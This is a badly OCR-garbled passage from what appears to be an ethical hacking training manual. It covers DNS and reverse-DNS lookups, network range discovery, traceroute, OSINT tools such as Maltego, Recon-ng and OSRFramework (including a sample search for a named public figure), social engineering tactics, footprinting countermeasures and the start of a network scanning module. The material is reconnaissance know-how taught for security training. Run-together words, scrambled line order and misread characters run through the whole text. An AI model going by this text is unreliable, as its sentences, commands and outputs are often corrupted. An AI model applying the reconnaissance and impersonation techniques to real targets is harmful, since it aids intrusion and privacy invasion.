lookup. Ifthetargetnetworkallowsunknown, unauthorized users to transferDNSzone data,
then it is easy for an attackerto obtainthe informationaboutDNSwith the helpof the ONS
tool,
interrogation
Whenthe attacker queriestheDNSserver usingthe DNSinterrogation
tool,the server responds
DNS.DNSrecordsprovide
with a recordstructure that contains informationaboutthe target
importantinformation aboutthelocationandtypesofservers.

regen
tea em eerie

—EB

Figure
262:Screenshot
ofProfessional
Toolset
alsouse DNSlookup
‘Attackers toolssuchas DNSdumpster.com, Bluto,and DomainDossierto
retrieve DNSrecordsfor a specified
domainor hostname. Thesetoolsretrieve informationsuch
{asdomainsandIPaddresses, domainWhoisrecords,DNSrecords, andnetworkWhoisrecords.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ReverseDNSLookup

ReverseDNSLookup
DNSlookup
operation a
is usedfor finding
is performed
the IPaddresses for given domainname, andthe reverse ONS
to obtainthedomainname of a givenIP address.
for a domainand typethe domainname i n the browser,
Whenyou are looking
the ONSconverts that domainname
address
into a n IP
forwardsand
name into an IPaddress
the request
i s performed
for further processing.
a
Thisconversion of domain
bya record.Attackersperform a reverse DNSlookupon

Attackers
a such
the IP rangeto locate DNSPTRrecordfor
usevarious toolssuchas DNSRecon
IP addresses.
andReverseIP DomainCheckforperforming the
reverse DNSlookup on the target or a range of IPaddresses,
host.Whenwe getan IPaddress we
can use thesetoolsto obtainthedomain name.
=
DNSRecon
Source:https://github.com
showni n the screenshot,
‘As attackersuse the following to perform
command a reverse
DNSlookup on the targethost:
dnsrecon -r 162.241.216.0-162.241.216.255
In theabovecommand, the-r optionspecifies (first-last)
the rangeof IPaddresses fora
reverse lookup
bybruteforce,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 162,241 ,216.0-162, 241,216.25
ReverseLook-up
Performing Rei of a

Range
kup from 162.241,216,0 to 162.241.216.255
PTR 162-241-216-5.unifiedlayer .com 162.241,2
PTR 162. uni fiedlayer.com
PTR 216-0.unifiedtayer.com 162.
PTR ‘unifiedlayer.com 162.
PTR unifiedlayer.com
162.241.2164
PTR 162-2
unifiedlayer.com
162.241.216.6
PTR 8.unifiedlayer.con
162.241.216.8
PTR 41-216-2. uni fiedlayer.com
162.241.216.2
PTR 162-241-216-3.unifiedlayer.com
162.241.216.3
PTR 6-9.unifiedlayer.com
162.241.216.9
PTR box5331,bluehost.com162.241.216.11
PTR box5334.bluchost.com 162-241.216.14
PTR box5348.
bluehost .com 162.241.216. 1
PTR 162-241-216-13.unifiedlayer.com162.241.216.13
PTR 162-241-216-15.unifiedlayer.com 162.241.216.15
PTR 162-241-216-10.unifiedlayer.com 162.241.216.180
PTR 162-241-216-16.unifiedlayer.com 162.241.216.16
PTR167-241.716.12 uni fiedlaver com 162_241.216.12
Parrot Terminal

DNSRecon
Figure2.63:
Screenshot
of showing
reverse DNS
lookupinformation

Attackersalsofindtheotherdomainsthatsharethe samewebserver usingtoolssuchas Reverse

IP Domain Check.
‘=
tools
possible
These list the
ReverseIPDomainCheck
hostedserver.
domains that are on the same web

Source:httpsi//www.yougetsignal.com
shownin the screenshot,
‘As
pointing
IP
to a web server andsearches
web server.
areverse
domain name
or
IP
checktakesa domain address
for other sites knownto be hostedon the same

ical andCountermensores
Mackin ©by E-Comel
Copyright
you
get
signal
ReverseIP DomainCheck
oT
[rcaerTaco Chck

Figure
2.64;
of Domain
SereenshotReverse
IP Check

une
 Locatethe NetworkRange
{@
Networkin rangeinermatonatt attackers cresting

find
ang
addrests
sare
ol
|@ ne can
ARIN
hot database
the of IP using

can
alo
(8 ne

Reonalof
ntermet
Registry
fnd he range adresses

(RR)
andthe

Network Footprinting
Thenext stepafterretrieving isgathering
the DNSinformation network-relatedinformation.
We
will now discussnetwork footprinting,
a methodof gathering the footprint
of the target
organization’s
network.Thissection describes
how to locatethe networkrange,traceroute
traceroute
analysis,
tools.
and
Locatethe Network Range

(One
needs basic
gatherto
important
information
does,
the organization about
target
and
organization,
they as
perform
who worksthere,
the
andwhat typeof work do to
such what
network

answers
footprinting.
the target questions
The
network provide
information
about
the
to these internalstructure of

gathering
‘After an attackercan proceed
the information, to find the networkrangeof a target.
system,Detailedinformationis availablefrom the appropriate regional
registrydatabase
regarding IP allocationandthe nature of the allocation,An attackercan alsodeterminethe
subnetmaskof the domainand trace the route betweenthe systemandthe targetsystem
toolsthat are widely
‘Traceroute usedincludePathAnalyzer Pro andVisualRoute.

Obtaining
privateIP addresses The Internet Assigned
can be usefulto attackers. Numbers
‘Authority
(IANA)hasreservedthe following
three blocksof the IP addressspacefor private
(10/8
internets: 10.0.0.0-10.255.255.255 prefix), (172.16/12
172.16.0,0-172.31.255.255 prefix),
(192.168/16
and192.168.0.0-192.168.255.255 prefix).
Usingthe networkrange, the attackercan getinformationabouthowthe networkis structured
andwhichmachines in thenetworks thenetworkrangealsohelps
a re alive.Using to identify
the
networktopology,access controldevice, andOSusedin the targetnetwork.Tofindthe network
of
the
range target network, one needs to enter IP address
the
serverwas
(that gathered
ical
i n Whois

andCountermensores ©
Mackin by E-Comel
Copyright
footprinting)
in the ARINWhois databasesearchtool. A user can alsovisit the ARINwebsite
(https://www.arin.net/about/welcome/region)
andenter the server IPi n theSEARCH Whoistext
box.Thisgivesthe networkrangeof thetargetnetwork.Improperly set up DNSservers offer
attackersa goodchanceof obtaining a list of internalmachines o n the server. In addition,
sometimes, if an attackertraces a route to a machine, it is possible
to obtainthe internalIP
addressof thegateway, whichcan beuseful

Our Region
ths page
ARIN's Region

Complete
List ofCounties i n the ARINRegion

sre 2.65:
Screenshat Region
ofARIN's

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Network:
NET-207-46-0-0-1

NetworkWhoisRecord
Queried
whois.arin.net
"207.46.232.182" with

Figure
typically
Attackers
Sereensho
2.6: resultof ARINWhoisdatabase
showing
usemore thanone toolto obtainnetworkinformation,
search

asa single
cesult

tool cannot
provide
allthe required
information.
 Traceroute CEH

(A
FER)
Fa)
Fa)
Traceroute (Cont'd)
iaim
i=
IMcP Traceroute
ToP
Traceroute

‘UDP
Traceroute
Es]
‘Traceroute

Finding oftarget
host
network
theroute the
necessary
test on the
attacksandother relatedattacks.Most operating
perform
is

thistask.It traces thepathor route through

systems
to against man-in-the-middle
come with a Traceroute utility
whichthe targethostpackets
to
travel in the
network.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Tracerouteusesthe ICMPprotocol conceptandTimeto Live(TTL)
fieldof the IP header
to find
the pathof the targethosti n thenetwork.
Traceroute utility
‘The through
can detailthe path whichIP packets travelbetweentwo systems.
The utilitycan trace the numberof routers the packets travel through, the round-triptime
(duration
exploiting
i n transiting
DNS
betweentwo routers),
entries,
of,
and,if the routers have
the routers and their networkaffiliation.It can also trace geographic
the names
locations.It worksby
a featureof the Internet ProtocolcalledTTL. TheTTL field indicates the maximum

packet
of a
number routerspacket may
traverse,
andtransmits an ICMPerror message
handlesthe
Each
TTL
router that a packet decrements
count field i n the ICMP headerbyone. Whenthe count reacheszero, the router discards
to theoriginator ofthepacket.
the

x! >
ra
=
=
—
i=
es)

Figure2.67: of Traceroute
tNustration

Theoftwo. and
a
utilityrecords
TTL value
router i n the path,
ofthe
through routeranother
Thispacket
Thissecond
packet
the IPaddress DNSname
makesit
router alsosends
andsendsout with
thefirst router andthen times-out at the next
a n error message backto the originatinghost.
Traceroute
finally continues
do
this
reaches
to
and andrecordstheIPaddress name of eachrouter until a packet
thetargethostor untilit decides
recordsthe time takenfor eachpacket
thatthe hostis unreachable. In the process,
to makea roundtrip to eachrouter. Finally,
it
when it
reaches the destination,the normalICMPpingresponsewill besent backto the sender. The
utilityhelps to revealthe IPaddressesof the intermediatehops i n the route to the targethost
fromthe source.

ical andCountermensores
Mackin ©by E-Comel
Copyright
ICMPTraceroute
Windowsoperatingsystembydefaultuses ICMPtraceroute. Go to the commandpromptand
typethe
tracert
command along
C:\>tracert 216.239.36.10
or
withthe destinationIP address domainname follows:
as
Tracing route to ns3.google.com [216.239.36.10] over a maximum of 30
hops
li<im <i <1 10.10.10.2
20 ms 4 5 1.6.15.234
2ims 19 21 100.66.8.23
20ms 19 19 100.68.8.23
23ms 42 20 72.14.210,200
2ims 21 23 108.170.248.163
68ms 67 67 209.85.242.115
102 ms 102 209.85.247.194
100 ms 106 72.14.239.175
aiams 119 209.85.244.31
aiams 112 209.85.247.118
ai4ms 118 74.125.253.85
aii ms 112 ns3.google.com[216.239.36.10]
Trace complete
TCP network ICMP
Traceroute
Many
devicesi n any are generally
configuredto block traceroute messages. Inthis
scenario,a n attackeruses TCPor UDPtraceroute,whichis alsoknownas Layer4 traceroute. Go

operating
to the terminali n Linux systemandtypethe teptraceroute
destinationIP addressor domainname as follows:
command along with the

teptraceroute www.google.com

ptraceroute wan
running
traceroute -T -0

10.10,10.2 (10.19.10.2

8 16100
132205505.in-£4,

17.491

Figure2.68: showing
Screenshot the outputof TCPTraceroute

ical andCountermensores
Mackin ©by E-Comel
Copyright
UDPTraceroute
LikeWindows,Linuxalsohasa bullt-n traceroute utility, but it usestheUDPprotocol
for tracing
the route to the destination.Go to the terminali n the Linux operating and typethe
system
traceroute command along with thedestinationIPaddressor domainname as follows
traceroute www.google.com

2.69:Screenshotshowing
Figure theoutputof UDPTraceroute

ical andCountermensores
Mackin ©by E-Comel
Copyright
 TracerouteAnalysis

amy —

TracerouteAnalysis
We haveseen howthe Traceroute utilityhelpsto find the IPaddresses of intermediatedevices
suchas routersandfirewalls presentbetweena source andits destination. Afterrunningseveral
an attackerwill beableto find thelocation a hop
traceroutes,
the following
traceroute resultsobtained: of in the targetnetwork.Consider

+
1.10.10.20, second to last hop is 1.10.10.1
traceroute
+
traceroute 1.10.20.10, third to last hop is 1.10.10.1
+
traceroute 1.10.20.10, second to last hop is 1.10.10.50
+
traceroute 1.10.20.15, third to last hop is 1.10.10.1
+
traceroute 1.10.20.15, second to last hopis 1.10.10.50
Byanalyzing results,
these diagram
an attackercan drawthe networktopology
network,as shownbelow.
the target
of

=e
a
Figure 2.70TracerouteAnalysis

ical andCountermensores
Mackin ©by E-Comel
Copyright
 TracerouteTools

TracerouteTools
Traceroutetoolssuchas PathAnalyzer Pro,VisualRoute,TracerouteNG,and PingPlotter are
usefulfor extractinginformationaboutthe geographical locationof routers,servers, andIP
devicesin a network,Suchtoolshelpus to trace,
identify,
andmonitor thenetworkactivityo n a

=
of
world map.Some the features

Hop-by-hop
traceroutes
Ping
ofthesetoolsare asfollows:

plotting =

Reverse
Historical
Port
probing
tracing
analysis
=

"Detect
networkproblems
Packetlossreporting metrics analysis
Performance
Reverse
DNS Networkperformance
monitoring
PathAnalyzer
Pro
Source:https://www.pathanalyzer.com
PathAnalyzerProperforms with performance
networkroute tracing tests,DNS,
Whois,
andnetworkresolution networkissues.
to investigate

use
Analyzer
‘AttackersPath
route
systemsgraphically. source
destination
Proto identify
the fromthe
As showni n the screenshot,
suchas the hopnumber,
information its IP address,
to
this tool helps
hostname,
target
attackersto gather
ASN,networkname,
loss,latency,
percentage average latency,and standarddeviationfor eachhopi n the
path,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 di
VisualRoute
Figure271:
Srensht ofPathAnaly
Pro
Source:http://nwwvisualroute.com
is a traceroute and networkdiagnostic
VisualRoute tool.Attackers
use VisualRoute to
identify
the geographical locationof routers,
servers, andotherIPdevicesi n the target
network.

Thisattackers
between
toolhelps
and obtaining
in trackingthepath
the resultsi n a graphical
thesource anddestination
systems
format.As showni n the screenshot, using

to
tool enablesattackers
VisualRoute
nodename, andgeographical
gatherinformation suchashopnumber,
locationof eachhopi n the route.
IPaddress,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 2.72:ScreenshotofViualRoute
Figure

et

oi©
ingcotemenitsate
 Footprinting SocialEngineering
through
neeringIan at ofexploiting
human
to
behaviourextractconfident information

Soctalengineersattemptto gather Social

engineering
techniques include

throughSocial Engineering
Footprinting
So far,we havediscussed the differenttechniques for gatheringinformation usingonline
resources or tools.Now, we will discussfootprinting
throughsocialengineering, i-e., the art of
obtaining information frompeople byexploitingtheirweaknesses. This section covers the
concept aswell as the techniques usedto gather
informationthrough socialengineering.
Socialengineeringis a non-technicalprocess i n which an attackermisleadsa person into
providing confidential inadvertently.
information In otherwords,the targetis unaware of the
fact that someone is stealing
confidentialinformation.Theattackertakesadvantage of the
gullible
ofpeople
nature
To perform
theirto
provide of
and willingness confidential
information.
socialengineering,an attackerfirst needsto gainthe confidence an authorized
user and then misleadthat user into revealing confidentialinformation.The goal of social
isto and
then
use
engineering obtainthe required
thatconfidential
maliciouspurposes such as gainingunauthorized
information
access to the system,
espionage,network intrusion,fraud,and so on. The information
identity
informationfor
theft,industrial
obtained through social
engineeringmay includecreditcarddetails,socialsecuritynumbers, usernames andpasswords,
other personalinformation, securityproducts in use, OSandsoftware versions, IP addresses,

of
names servers, networklayout information,
Socialengineeringcan be performed
andso on.
i n manyways,suchas eavesdropping,
shouldersurfing,
dumpster
diving, tailgating,
impersonation, authorization,
third-party piggybacking,
reverse

social and
engineering, on. so

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Dumpster
InformationUsing
Collecting
Diving,
ShoulderSurfing,
Eavesdropping,
and Impersonation (py Lu

|
Tesgecovention sce

Information UsingEavesdropping,
Collecting Shoulder Surfing,
Dumpster
Diving,and Impersonation
Eavesdropping,
shouldersurfing,
dumpster diving,
and impersonation
are socialengineering
that are widely
techniques usedto collectinformationfrompeople.
Eavesdropping
Eavesdropping of
or isthe
act
videoconferencesecretly
listening
their
without of a
reading
to the conversations
consent.It alsoincludes
fromcommunication media,suchas instant messaging
people over phone
confidentialmessages
or faxtransmissions.It is the act
of interceptingcommunication i n any form suchas audio, video,or text without the
consent ofthe communicating
conversations or attacker
gains
parties.
audio,
intercepting
The
video,or
information
written communication.
bytapping phone

ShoulderSurfing
surfing
Shoulder whereby
is a technique attackers observe
secretly the targetto gain
criticalinformation.In the shouldersurfing technique, an attackerstandsbehindthe
victim and secretly observes activities on thecomputer,
the victim’s such as keystrokes
while entering usernames, passwords, and so on. The technique is effectivein gaining
passwords,
information,
place,
personal
and
similar codes,
identificationnumbers,

data. easily
as it is relativelyshoulder
Attackerscan
security
perform
accountnumbers,
surfing
creditcard
in a crowded
easy to standbehindand watchthe victim without his or her
knowledge.
DumpsterDiving
alsoknownas trashing,
Thisuncouthtechnique, involvesthe attackerrummagingfor
information bins.Theattacker
in garbage maygainvital information
suchas phone
bills,
ical andCountermensores
Mackin ©by E-Comel
Copyright
contact information,financialinformation, operations-related printoutsof
information,
source codes, printoutsof sensitive information, company’s
and so on fromthe target
trashbins,printerwaste bins,sticky
also gather
notes at users’
desks,andso
on. Theattacker
account informationfrom ATM trashbins.The informationcan helpthe
attackerto commit attacks.
may

Impersonation
Impersonation
is a technique
whereby
an attackerpretends
to be a legitimate
or
authorized
person.Attackersperform impersonation attacks personally
or use phones or
‘other
communication mediato misleadtargetsandtricktheminto revealing information
Theattackermightimpersonate a courier/delivery person,janitor,businessman,client,
or he/she
technician, may pretend to be a visitor. Using this technique,
an attacker
gathers
sensitive informationbyscanning
terminalsfor passwords,
searching
important
documents o n desks,rummaging bins,andso on. Theattackermayeven tryto overhear
“shoulder
confidentialconversations and
surf― to obtainsensitive information.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Flow

ootprintingConcepts

Tools
Footprinting

Footprinting
Countermessures

Footprinting
Tools:Maltego
and Recon-ng

2
Module 222
Page tical andCountermensores
Making Copyright©
by Comet
 Tools:FOCA and OSRFramework
Footprinting

Footprinting
Tools:OSINTFramework
(SINT Framework
(©
ost Frameworksan open

{ntherng
framework
tentering
f ran
source
nteligence
thatf ocsed on
fomfre tol or

2
Module 222
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 Tools(Cont'd)
Footprinting CEH

Tools
Footprinting
Varioustools helpattackersin footprinting.Manyorganizations offer tools that make
information gathering
an easy task. This section describestools intended for obtaining
information
fromvarious sources.
toolsare usedto collectbasicinformationabout targetsystems
Footprinting to exploit
them.
Informationcollectedbythe footprintingtools includesthe target’s
IP locationinformation,
routinginformation, information,
business address, phone numberandsocialsecuritynumber,
details
=
about
a
Maltego
a information,
domainso
sourceof an emailand file,DNS information,and on.

https://www.paterva.com
Source:

is
a that
Maltego program
people,
between
documents,
ete.
can
people,
groupsof the and
real-world
beusedto determinerelationships
websites,
organizations, Internet infrastructure,
links

Attackerscan use different entities availablein the tool to obtain informationsuchas

addresses,
‘email a listof phone numbers, and a target's (domains,
Internet infrastructure
DNSnames,Netblocks,IPaddresses information).
shownin the screenshot,
‘As attackersadda Person
name, andobtaintheemailaddressesassociated entity,
rename it withthe target's
withthe target.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure of Maltega
2.72:Screenshot
Recon-ng
Source:https://github.com
Recon-ng is a web reconnaissance frameworkwith independent
modulesfor database
interaction that provides a n environment i n which open-sourceweb-based
reconnaissance can beconducted.
shown
‘As the screenshot,
in attackers use the module recon/domains-
hosts/hackertarget
to extract alist of subdomains
andIPaddresses
associated
with
the target
URL. Attackers
use thismoduleto

gather
target information

Obtainlist of
subdomains
andtheir IP
addresses

FOCA
Figure2.74
of
Screenshatrecon-ng

Source:https://www.elevenpaths.com
Fingerprinting withCollected
Organizations Archives
(FOCA) is a toolusedmainly
to find
metadataandhiddeninformationi n the documentsthat its scans. FOCAis capableof
scanningandanalyzing
a widevariety of documents,with the most common ones being
MicrosoftOffice,
OpenOffice,
or PDF files,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Features:

Web
Search
analyzed
-

for hostsanddomainnamesthrough
Searches
domain.Eachlink is
main
domainnames.
URLs associated
withthe
to extract informationfrom its new hostand

DNSSearch Checks
-
i n NS,
eachdomainto ascertainthe hostnames configured MX,
andSPFservers to discover
thenew hostanddomainnames.
IPResolutionResolves
-

eachhostn ame bycomparison withthe DNSto obtainthe IP

with this server name. To perform
addressassociated thistask accurately,
the tool
performsanalysis
againstthe organization'sinternalDNS.

PTR- of a determinedaddress;
ScanningFindsmore servers in the same segment
FOCAexecutes a PTRlogscan.
IP

Bing IP Launches
-

FOCA, whichis a search fornew domainnamesassociated

process
with that IPaddressfor eachIPaddressdiscovered.
0 Common Names Performdictionary
-

attacksagainst
the DNS.
shownin the
‘As screenshot, attackerssearchthe targetdomainand obtain the file
informationstoredin it. Theextractedfilescan beviewedon the webbrowser.Further,
the attackerscan view additional information such as network domains, roles,
vulnerabilities,
andmetadataof the target
domain.
sats oben
“Aches search
daplaygt

275:
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
(OSRFramework
Source:https://github.com
includesapplications
‘OSRFramework related to username checking, DNSlookups,
information
leaksresearch,
deepwebsearch, andregular extraction.
expression
The tools includedin the OSRFramework package
that attackerscan use to gather
informationon the target
are listedbelow:

© usufy.py Checks
~

fora user profile

o n upto 290different
platforms
mailfy.py Check
-
forthe existenceof a givenemail

domainfy
on
searchfy.pyPerformsa query the platforms
py Checks
-

for the
~

existenceof
i n OSRFramework

domains
phonefy.pyChecks ~

forthe existenceofa givenseriesof phones

‘As
‘enti
Uses toextract
fy.py -

regular
expressions entities
attackersuse the following
showni n the screenshot, commandto searchfor a target
useron socialmedia platforms,
usufy.py -n Mark Zuckerberg
-p twitter facebook youtube

Sereenshot
Figure 2.76: ofOSRFramework

ical andCountermensores
Mackin ©by E-Comel
Copyright
OSINTFramework
Source:https://osintframework.com
OSINTFramework is an open source intelligence
gathering frameworkthat helpssecurity
professionals
in performing automated footprinting
andreconnaissance,OSINTresearch,
and intelligencegathering. It is focusedon gatheringinformationfrom free tools or
resources.Thisframework
arrangedbycategory,
includes
various
OSINT
tools,
a simplewebinterface that lists
andit is shownas an OSINTtree structure on thewebinterface.
shownin thescreenshot,
‘As following
thetoolslistedincludethe indicators:
>
(T)=
Indicates
a
toolmust
be
installed
link to a
locally
that andrun
©

(R)
-
dork
(D)-Google
Requires registration
(M)-
that
Indicates
manually
a URL
itself
must
contains thesearchterm andthe URL beedited

Recon-Dog
Source:https://www.github.com
Recon-Dog is an all-in-onetool for all basicinformationgathering
collectinformationaboutthe targetsystem.
needs.It uses
APIs
to

ical andCountermensores
Mackin ©by E-Comel
Copyright
Features:
Censys:
a of
to gathermassiveamount informationabout an IP
Usescensys.io
address,
NS
Performs
lookup:
namelookup
TCP
server
Portscan: Scansmostcommon ports
DetectCMS:Candetect400+content management
systems
lookup:
‘Whois
honeypot:
Detect
aWhois honeypot
Performs
Usesshodan.io
lookup
to check
if thetargeti s a

Find subdomains:
Reverse
tofind
Usesfindsubdomains.com subdomains
IP lookup: a reverse IPlookup
Performs to find domainsassociated
with an
IP address
Detecttechnologies:
Useswappalyzer.com
to detect1000+technologies
All:
Runs
utilities
against
all the target

2.78:Screenshot
Figure of Recon
Dog

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Billcipher
Source:https://www.github.com

isainformation
Billcipher
operating
‘options
n gathering
system or
thatsupports
suchas DNSlookup,
tool for a website IPaddress.It can workon any
Python
2,Python
Whoislookup,
3,andRuby. Thistoolincludes
portscanning,zone transfer,
various
hostfinder,and
reverse IP lookup,
whichhelp
to gather
criticalinformation,

279:Sereenshot
Figure ofBilCipher
Someadditionalfootprinting
toolsare listedbelow:
=
theHarvester(http://www.edge-security.com)
+

Th3inspector
Raccoon
(https://github.com)
(https://aithub.com)
Orb(hetps://aithub.com)
PENTMENU(hetps://github.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Flow

ootprintingConcepts

Footprinting
Tools

Footprinting
Countermeasures

WB resin
employes
acess
netwoting
Stes network tosci tomtheonan’

wb
enter sete lmao leakage

Ooot
product
revit iomatonin presen reports clogs.

mun
Unithe noma pblihd on th weber

earch
Prevent
engines
web
page
romcaching
2 andse anonymous
registration
series

2
Module 222
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 Countermeasures(Cont'd)
Footprinting

Countermeasures
Footprinting
Sofar,w e havediscussed theimportance offootprinting,various waysto perform
thetask,and
thetoolsthat helpin its execution. Now, footprinting
we will discuss i.e., the
countermeasures,
measuresor actionstakento prevent or offsetinformationdisclosure.
Someofthe footprinting
countermeasuresare as follows:
+

*
Restrictthe employees’
Configure
webservers
to
access socialnetworking
sitesfromthe organization's
to avoidinformationleakage
network

+
Educateemployees to use pseudonymson blogs,
groups,andforums
Donot revealcritical
information annualreports,
in pressreleases, catalogs,
product and

publishingon the website/Internet,

Limit the amount of informationthat you are
Usefootprinting
techniques
to discover publicly
and remove any sensitive information
available
Prevent search

Develop
engines fromcaching
a web page anduse anonymousregistration

and enforcesecuritypolicies
suchas informationsecuritypolicy,
services

password
policy,
andso on, to regulate
theinformationthat employees
can revealto third parties
Set apartinternalandexternalDNSor use splitDNS,and restrict zone transferto
authorized
servers
Disable
directorylistings
in the webservers

ical andCountermensores
Mackin ©by E-Comel
Copyright
Conduct a wareness trainingperiodically
security aboutvarious
to educateemployees
socialengineering tricksandrisks
Optfor privacyservices on Whoislookupdatabase
‘Avoid
domain-level cross-linking
forcriticalassets
Encryptandpassword-protect sensitive information
Donot enableprotocols
that are not required
Alwaysuse TCP/IP
andIPSecfiltersfor defensei n depth
Configure through
lS to avoidinformationdisclosure bannergrabbing,
Hidethe IP address
andthe relatedinformation
byimplementing the
VPNor keeping
behinda secure proxy
server

archive.org
Request to deletethe history
of thewebsitefromthe archivedatabase
thedomainname profile
Keep private
Placecriticaldocumentssuchas businessplans documentsofflineto
and proprietary
preventexploitation
Train employees techniques
to thwartsocialengineering andattacks
Sanitizethe detailsprovided
to theInternetregistrars
to hidethe direct
contact detailsof
the organization
functionality
Disablethe geo-tagging geolocation
on cameras to prevent tracking
‘Avoid
revealing
one’s or travel plans
location networking
on social sites
Turn-offgeolocation
accesson all mobiledeviceswhennot required
Ensurethat no criticalinformationsuchas strategicplans, information,
product andsales
is displayed
projections on notice boardsor walls

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Summary

In this module,we havedacused thefolowing:

>
Footornting an theobecvesoffooting
concent
>

variousas engines,
services,
fotoritngtechnaues,
troughweb
footprinting
such fotoritng troughseach
andfootprinting ses
though networking
social

>

nthe net
can defend
Howorganisations

module,we wil dus

agains
fotoriming
in
andreconnaissance actives
detahowatackers, ethical
hacer,andpentesters

Module Summary
This modulepresented footprinting concepts alongwith the objectives of footprinting. It
provided a detailedexplanation of the various techniques usedfor footprinting through search
engines.Further, it describedfootprinting throughweb services andsocialnetworking sites.In

in website
and
email techniques.
Whois
and
addition,it discussed footprinting It alsoexplained DNS
footprinting
Moreover,
It also explained
important
described
network
detail.
footprinting
footprinting
footprinting
traceroute
analysis.
it
through
along
socialengineering. Finally,
with
it presented
tools.Themoduleendedwith a detaileddiscussion
an overview of
of howorganizations
can defendthemselves against footprinting andreconnaissanceactivities.
In the next module,
we will discussi n detail howattackersas well as ethicalhackers
and pen
testers perform
networkscanningto collectinformation abouta targetforevaluation beforean
attackor audit.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module03:
Scanning
Networks
 Module Objectives

08Discovery
Understanding

Understanding to Scan
various Techniques
DS
Beyond andFirewal

Network
Drawing Digrams

Module Objectives
Afteridentifyingthe targetandperforming the initial reconnaissance,as discussed in the
FootprintingandReconnaissance module,
attackersbegin to searchfor an entrypointinto the
targetsystem.Attackers shoulddetermine
whetherthetargetsystems are active or inactive to
reducethe time spento n scanning.Notably,
the scanningitselfis not the actualintrusion but an
extendedformof reconnaissance i n whichthe attackerlearnsmore about his/her target,
including
information
about
OSs,
from suchreconnaissancehelps
network.
services, andany configuration
theattacker selectstrategies
lapses.
The
for attacking information
gleaned
thetargetsystem
or

Thismodulestartswith an overview of networkscanningandprovides insights

into various host
discovery
techniques that can beusedto check for live and active systems.Furthermore, it
various portandservice discovery
discusses techniques, operatingsystem discovery techniques,
and for IDS
network
diagrams.and
techniques scanning beyond firewalls. Finally,it endswith an overview
ofdrawing

At network
will
the endof thismodule,
Describe
the
you beableto:
scanningconcepts

various
scanning
Use

‘=
tools
Performhostdiscoveryto check
for live systems
Performportandservice discovery techniques
usingvarious scanning
beyond
‘Scan (IDS)
intrusion detectionsystems andfirewalls
Perform
operating (OS)
system discovery
Drawnetworkdiagrams
usingnetworkdiscovery
tools

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Flow CEH

seaning Tse WToreeperscsrenice―

Network Scanning
Concepts
Asalready
discussed, the this
footprinting phase
informationabouta potential
gather
is first
He/she
target.
more detailsaboutthe target.
ofhacking,
then uses
in whichtheattackergainsprimary
phase
informationi n the scanning
to

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Overview of Network Scanning

(@Network cefers
toaset ofprocedures NetworkSeanning
Process

for services
s canning
used identifying
hosts,ports,a nd

Network
of
s canningone the components
Ineoligence whichcanbeused
gathering
of
byan
to aprofile
ofthe
attacker create target
—
‘come

ro decover livehosts,
IPaddress,
andopenportsafive hosts

Orjectives
of
Network |― Todiscover operating andsystem
systoms architecture

Overview of Network Scanning

Scanning
complex
procedures
of
is the process gathering
additionaldetailedinformationaboutthe targetusing highly
and aggressivereconnaissance techniques.
usedfor identifyinghosts,
Network scanningrefersto a set
ports,andservices i n a network.Networkscanningis also
of
usedfordiscovering active machinesi n a network andidentifying the OSrunningon thetarget

him/her
attackertries to gather
most
machine.It is one of the
enables important
phases
intelligence
to create a profile
information,
of thetarget
including
of
organization.
the specific
gathering for an attacker,
In the process
IPaddresses
which
of scanning,the
that can beaccessed over
the network, the target’s
OSandsystem architecture,
andthe ports along with their respective
services runningon eachcomputer.

Sends
TCP/IP
probes

Getsnetwork
information

Attacker gue Network

3.1: process
s canning
Network

Thepurposeof scanningis to discoverexploitable probe

communications channels, as many
listenersas possible,
andtrackthe ones that are responsive or usefulto an attacker'sparticular
needs. phase
In the scanning of an attack,theattacker tries to find various ways to intrudeinto
a targetsystem, Theattackeralsotries to discoverm ore informationaboutthe targetsystem to
determinethe presenceof any configuration lapses. Theattackerthen uses the information
obtainedto develop an attackstrategy.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of Scanning
‘Types
‘=

Port Liststheopen
Scanning ~

ports
services.
process
and
the services running on the targetcomputerof Portscanning
bysending
i s the checking
a sequence of messagesi n an
attempt
of the targetsystem
state.Thelistening
connecting
to breakin. Portscanninginvolves

state provides information

to or probing TCPandUDPports
to determinewhetherthe services are running or are i n a listening
aboutthe OSandtheapplication currently
in use, Sometimes, active services that are listeningmayallow unauthorizedusers to
misconfigure systems or to run softwarewith vulnerabilities.

Network Scanning —

Lists the active hostsand IP addresses. Networkscanningis a

identifying
procedure
security
for
of the network,
active hostson a network, either to attackthemor assessthe

Vulnerability ScanningShowsthe presence of known weaknesses.

-

Vulnerability
scanningis @ methodfor checking whethera system is exploitable byidentifying its

cataloga
vulnerabilities.A vulnerability scanner consistsof scanning engineand a catalog.
includesa list of common fileswith knownvulnerabilitiesand common exploits
The

of A for a range servers. vulnerability

directory traversalexploits.
list,transferring therequest
scanner may,for example,
Thescanningenginemaintains logic
to the webserver,andanalyzing
lookfor backup
for reading
therequests
filesor
the exploit
to ensure the
safetyof the server. Thesetools generally targetvulnerabilitiesthat secure host

tobcan
configurations fixeasily through updated securitypatches anda cleanwebdocument.

A who
thief
are
computer
reaklooks
usually access
points windows.
wants intoa house
the house'spointsof vulnerability,
systems andnetworks,
for
as theyare easily
suchasdoorsand
accessible.
portsare thedoorsandwindowsof a system
Whenit comes to
that an intruder
These

uses to gainaccess,A generalrulefor computer systemsis that the greaterthe numberof open
is
portso n a system,themore vulnerable the system.
withfeweropenportsthananothermachinepresents
However, thereare casesi n whicha system
amuchhigher levelof vulnerability.
Objectives of NetworkScanning
The more theinformation the higher
at handabouta targetorganization, are the chances of
knowing loopholes,
